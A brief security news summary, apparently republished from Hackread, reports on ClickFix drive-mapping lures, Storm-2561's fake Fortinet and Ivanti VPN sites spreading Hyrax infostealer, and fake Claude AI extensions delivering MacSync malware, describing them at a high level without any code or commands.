Originally reported by Hackread
TL;DR
Security researchers have identified an evolution in ClickFix social engineering attacks, with new variants mapping attacker-controlled network drives, Storm-2561 using fake Fortinet/Ivanti VPN sites to distribute Hyrax infostealer, and MacSync malware targeting developers via fraudulent Claude AI extensions.
Multiple active social engineering campaigns using sophisticated techniques to deliver infostealers and malware, including Microsoft-tracked threat actor Storm-2561. While no confirmed mass exploitation, the campaigns target high-value victims including developers.
Social engineering campaigns leveraging the ClickFix technique have expanded their technical arsenal, moving beyond simple browser troubleshooting lures to more sophisticated attack vectors targeting different user populations.
Researchers have documented a new ClickFix variant that tricks Windows users into executing hidden PowerShell commands that map attacker-controlled network drives. This technique allows threat actors to establish persistent access to victim systems while appearing to resolve legitimate technical issues.
The attack leverages users' trust in technical support workflows, presenting fake error messages that prompt victims to run "diagnostic" commands that actually establish connections to malicious infrastructure.
Microsoft Defender Experts identified Storm-2561, a threat actor using fake Fortinet and Ivanti VPN login portals to distribute Hyrax infostealer malware. The campaign, active since mid-January 2026, targets organizations by spoofing legitimate VPN infrastructure.
The attack chain begins with convincing replica sites of popular enterprise VPN solutions. Users attempting to authenticate are instead served malware payloads designed to harvest credentials and system information.
7AI security researchers documented a Claude Fraud campaign deploying MacSync malware against software developers. The attack uses fraudulent browser extensions claiming to enhance Claude AI functionality, distributed through malicious Google advertisements.
The campaign specifically targets tech professionals by exploiting the growing adoption of AI development tools. Fake extensions appear in search results for legitimate Claude AI utilities, leading developers to install information-stealing malware disguised as productivity enhancements.
These campaigns demonstrate the continued evolution of social engineering techniques, with threat actors adapting to target specific professional groups and leveraging emerging technology trends. The ClickFix methodology has proven effective enough to warrant expansion into new technical domains.
The combination of drive mapping, VPN spoofing, and AI tool impersonation represents a sophisticated understanding of different user trust models and technical environments.
Originally reported by Hackread